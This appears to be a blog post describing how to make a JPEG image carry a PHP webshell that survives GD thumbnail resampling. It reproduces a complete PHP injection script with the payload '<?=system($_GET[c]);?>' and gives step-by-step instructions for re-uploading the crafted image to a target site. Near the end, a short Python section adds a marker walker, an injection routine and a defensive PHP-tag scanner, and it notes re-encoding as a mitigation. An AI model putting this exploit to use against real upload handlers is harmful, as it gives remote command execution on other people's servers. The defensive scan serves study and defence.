Bypassing PHP's imagecopyresampled() and imagecopyresized() to build a JPG image shell

Someone previously published a method that survives the two resampling functions above using a PNG. The principle is to fill the PNG's IDAT chunks with a one-line webshell, applying a set of modulo operations so that the bytes still decode to the payload after re-compression. See:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

But that approach is constrained: the image has to be 320×320, and it has to be a PNG.

So what about JPG?

An ingenious foreigner (Sergey Bobrov, credited in the script itself) came up with the following method. The idea is to splice the payload in at the start of the entropy-coded scan data, right after the SOS marker, and then use libjpeg's own "extraneous bytes before marker" warning, surfaced through GD as a PHP warning, to find a NUL padding length for which GD decodes the file cleanly:

<?php
/*
The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
caused by PHP functions imagecopyresized() and imagecopyresampled().
It is necessary that the size and quality of the initial image are the same as those of the processed
image.

1) Upload an arbitrary image via secured files upload script
2) Save the processed image and launch:
   php jpg_payload.php <jpg_name.jpg>

In case of successful injection you will get a specially crafted image, which should be uploaded again.

Since the most straightforward injection method is used, the following problems can occur:
1) After the second processing the injected data may become partially corrupted.
2) The jpg_payload.php script outputs "Something's wrong".
If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
initial image.

Sergey Bobrov @Black2Fan.

See also:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

*/

$miniPayload = '<?=system($_GET[c]);?>';

if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    die('php-gd is not installed');
}

if(!isset($argv[1])) {
    die('php jpg_payload.php <jpg_name.jpg>');
}

// GD re-raises libjpeg diagnostics (e.g. "N extraneous bytes before marker")
// as PHP warnings; the handler records them to steer the padding search.
set_error_handler("custom_error_handler");

// Try increasing amounts of NUL padding after the payload until GD decodes
// the spliced file without complaint.
for($pad = 0; $pad < 1024; $pad++) {
    $nullbytePayloadSize = $pad;
    $dis = new DataInputStream($argv[1]);
    $outStream = file_get_contents($argv[1]);
    $extraBytes = 0;
    $correctImage = TRUE;

    if($dis->readShort() != 0xFFD8) {
        die('Incorrect SOI marker');
    }

    // Walk the marker segments: 0xFF, marker byte, big-endian length
    // (the length field counts itself, hence the "- 2").
    while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
        $marker = $dis->readByte();
        $size = $dis->readShort() - 2;
        $dis->skip($size);
        if($marker === 0xDA) {
            // SOS reached: the entropy-coded scan data starts here, and this
            // is the offset at which the payload is spliced in.
            $startPos = $dis->seek();
            $outStreamTmp =
                substr($outStream, 0, $startPos) .
                $miniPayload .
                str_repeat("\0", $nullbytePayloadSize) .
                substr($outStream, $startPos);
            checkImage('_'.$argv[1], $outStreamTmp, TRUE);
            if($extraBytes !== 0) {
                // libjpeg reported stray bytes before the next marker. Find
                // the end of the scan (first 0xFF not followed by a 0x00 stuff
                // byte) and trim that many bytes off the end of the padded
                // scan so that the overall length lines up again.
                while((!$dis->eof())) {
                    if($dis->readByte() === 0xFF) {
                        if($dis->readByte() !== 0x00) {
                            break;
                        }
                    }
                }
                $stopPos = $dis->seek() - 2;
                $imageStreamSize = $stopPos - $startPos;
                $outStream =
                    substr($outStream, 0, $startPos) .
                    $miniPayload .
                    substr(
                        str_repeat("\0", $nullbytePayloadSize) .
                            substr($outStream, $startPos, $imageStreamSize),
                        0,
                        $nullbytePayloadSize + $imageStreamSize - $extraBytes) .
                    substr($outStream, $stopPos);
            } elseif($correctImage) {
                $outStream = $outStreamTmp;
            } else {
                break;
            }
            if(checkImage('payload_'.$argv[1], $outStream)) {
                die('Success!');
            } else {
                break;
            }
        }
    }
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');

// Write the candidate to disk and let GD decode it; any warning raised during
// the decode flips $correctImage to FALSE via the error handler.
function checkImage($filename, $data, $unlink = FALSE) {
    global $correctImage;
    file_put_contents($filename, $data);
    $correctImage = TRUE;
    imagecreatefromjpeg($filename);
    if($unlink)
        unlink($filename);
    return $correctImage;
}

function custom_error_handler($errno, $errstr, $errfile, $errline) {
    global $extraBytes, $correctImage;
    $correctImage = FALSE;
    if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
        if(isset($m[1])) {
            $extraBytes = (int)$m[1];
        }
    }
}

// Minimal forward-only byte reader; seek() reports how many bytes have been
// consumed so far, which is used as the splice offset.
class DataInputStream {
    private $binData;
    private $order;
    private $size;

    public function __construct($filename, $order = false, $fromString = false) {
        $this->binData = '';
        $this->order = $order;
        if(!$fromString) {
            if(!file_exists($filename) || !is_file($filename))
                die('File does not exist ['.$filename.']');
            $this->binData = file_get_contents($filename);
        } else {
            $this->binData = $filename;
        }
        $this->size = strlen($this->binData);
    }

    public function seek() {
        return ($this->size - strlen($this->binData));
    }

    public function skip($skip) {
        $this->binData = substr($this->binData, $skip);
    }

    public function readByte() {
        if($this->eof()) {
            die('End Of File');
        }
        $byte = substr($this->binData, 0, 1);
        $this->binData = substr($this->binData, 1);
        return ord($byte);
    }

    // JPEG lengths and markers are big-endian; $order = true selects little-endian.
    public function readShort() {
        if(strlen($this->binData) < 2) {
            die('End Of File');
        }
        $short = substr($this->binData, 0, 2);
        $this->binData = substr($this->binData, 2);
        if($this->order) {
            $short = (ord($short[1]) << 8) + ord($short[0]);
        } else {
            $short = (ord($short[0]) << 8) + ord($short[1]);
        }
        return $short;
    }

    public function eof() {
        return strlen($this->binData) === 0;
    }
}
?>

http://pastebin.com/3cznqi8P
The concrete procedure is:
1.  First upload the original image you want to turn into the image shell.
2.  Wait for the site to generate the thumbnail, then download it.
3.  Run the script above on that thumbnail to produce the image carrying the webshell.
4.  Re-upload it to the site. Done.

This one also involves a measure of luck.
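As an added example (not part of the original post and not Bobrov's script), the following Python walks the same JPEG marker structure the PHP above depends on: it locates the SOS segment, splices a payload at the same offset the script uses, and then runs the check a defender would want on an uploaded file, reporting every PHP open tag and whether it sits in the header segments or in the scan data. The JPEG bytes are constructed inline and only structurally valid (not meant to be decodable), and the list of tags to flag is an assumption.

```python
"""JPEG marker walk, payload placement and a defensive PHP-tag scan.

Added example: pure standard library, independent of jpg_payload.php.
SAMPLE_JPEG below is hand-built so the marker chain is valid; the
quantisation/Huffman tables and scan bytes are filler.
"""
import struct

# Assumption: the open tags worth flagging. A bare "<?" is too noisy,
# because any two random bytes in compressed scan data hit it 1/65536.
PHP_TAGS = (b"<?php", b"<?=")


def walk_segments(data: bytes):
    """Return [(marker, offset, length_field)] from SOI up to and
    including SOS. Same loop as the PHP script: 0xFF, marker byte,
    big-endian length that counts itself. Stand-alone markers (RSTn)
    only occur inside scan data, so they never appear before SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    segs, pos = [], 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segs.append((marker, pos, length))
        pos += 2 + length
        if marker == 0xDA:  # SOS: entropy-coded scan data follows
            break
    return segs


def scan_data_offset(data: bytes) -> int:
    """Offset of the first entropy-coded byte, i.e. the splice point."""
    segs = walk_segments(data)
    if not segs or segs[-1][0] != 0xDA:
        raise ValueError("no SOS marker found")
    _, pos, length = segs[-1]
    return pos + 2 + length


def inject(data: bytes, payload: bytes, pad: int = 0) -> bytes:
    """Place payload plus `pad` NUL bytes at the start of the scan data,
    exactly where jpg_payload.php puts $miniPayload."""
    off = scan_data_offset(data)
    return data[:off] + payload + b"\x00" * pad + data[off:]


def find_php_tags(data: bytes):
    """Defensive check: every PHP open tag with its offset and region."""
    segs = walk_segments(data)
    scan_off = scan_data_offset(data) if segs and segs[-1][0] == 0xDA else len(data)
    hits = []
    for tag in PHP_TAGS:
        start = 0
        while True:
            i = data.find(tag, start)
            if i == -1:
                break
            hits.append((i, tag.decode(), "scan" if i >= scan_off else "header"))
            start = i + 1
    return sorted(hits)


def _seg(marker: int, body: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body


# Constructed sample: SOI, APP0, DQT, SOF0 (8x8 grayscale), DHT, SOS, scan, EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _seg(0xDB, b"\x00" + bytes(64))
    + _seg(0xC0, b"\x08\x00\x08\x00\x08\x01\x01\x11\x00")
    + _seg(0xC4, b"\x00" + bytes(16))
    + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56\x78\x9a\xbc"
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print("segments:", [hex(m) for m, _, _ in walk_segments(SAMPLE_JPEG)])
    print("scan data starts at", scan_data_offset(SAMPLE_JPEG))
    shelled = inject(SAMPLE_JPEG, b"<?=system($_GET[c]);?>", pad=4)
    print("clean:", find_php_tags(SAMPLE_JPEG))
    print("shelled:", find_php_tags(shelled))
```

On the sample, the splice point is byte 133 and the injected tag is reported in the scan region, which is where a GD-surviving payload ends up with this technique. The scan is a cheap pre-filter, not a guarantee: the real mitigation the script's own header comment points at is to re-encode every upload at a size and quality the uploader cannot predict, since the payload only survives when the second pass matches the first.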

The admin (园长MM) over on drops said she likes looking at my images; I can tell you that this image works.

Time: 2024-10-06 14:08:27
